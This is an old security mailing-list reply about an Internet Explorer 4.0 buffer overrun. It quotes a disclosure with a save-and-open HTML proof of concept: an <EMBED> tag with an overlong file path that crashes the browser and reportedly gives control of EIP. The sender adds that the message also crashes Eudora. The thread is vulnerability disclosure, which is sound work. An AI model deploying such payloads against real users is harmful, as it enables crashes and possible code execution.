Re: MSIE buffer overrun

[pt95cho () STUDENT HK-R SE (Christian Holmqvist)]

On Fri, 20 Mar 1998, Georgi Guninski wrote:
Hi!

This not only crashes MSIE4 but also Eudora4.0 (yes the mail reader...)
I can't read this mail with out a crash. I had to read it in pine on a
unix system.

Cheers Christian

> Microsoft Internet Explorer 4.0 (don't know for other versions)
> can be crashed and eventually made execute arbitrary code
> with a little help of the <EMBED> tag.
>
> The following:
> <EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________>
> opens a dialog box and closes IE 4.0.
> It seems that the long file extension causes stack overrun.
>
> The stack is smashed - full with our values, EIP is also ours and CS=SS.
> So probably a string could be constructed, executing code at the
> client's machine.
>
> Solution: Do not browse hostile pages.
> To try this: http://www.geocities.com/ResearchTriangle/1711/msie.html
>
>
> Georgi Guninski
> http://www.geocities.com/ResearchTriangle/1711
>
> -----------------------cut here and save as
> crashmsie.html---------------------
> <HTML>
> Trying to crash IE 4.0
> <EMBED
> SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456756789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789>
>                                                                40
> 80                                                                               160                    170           
>       180                 190          200
> </HTML>

Mvh Christian

/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\
| Christian Holmqvist            |
| Email: pt95cho () student hk-r se |
| Tele: 0457-17754               |
\________________________________/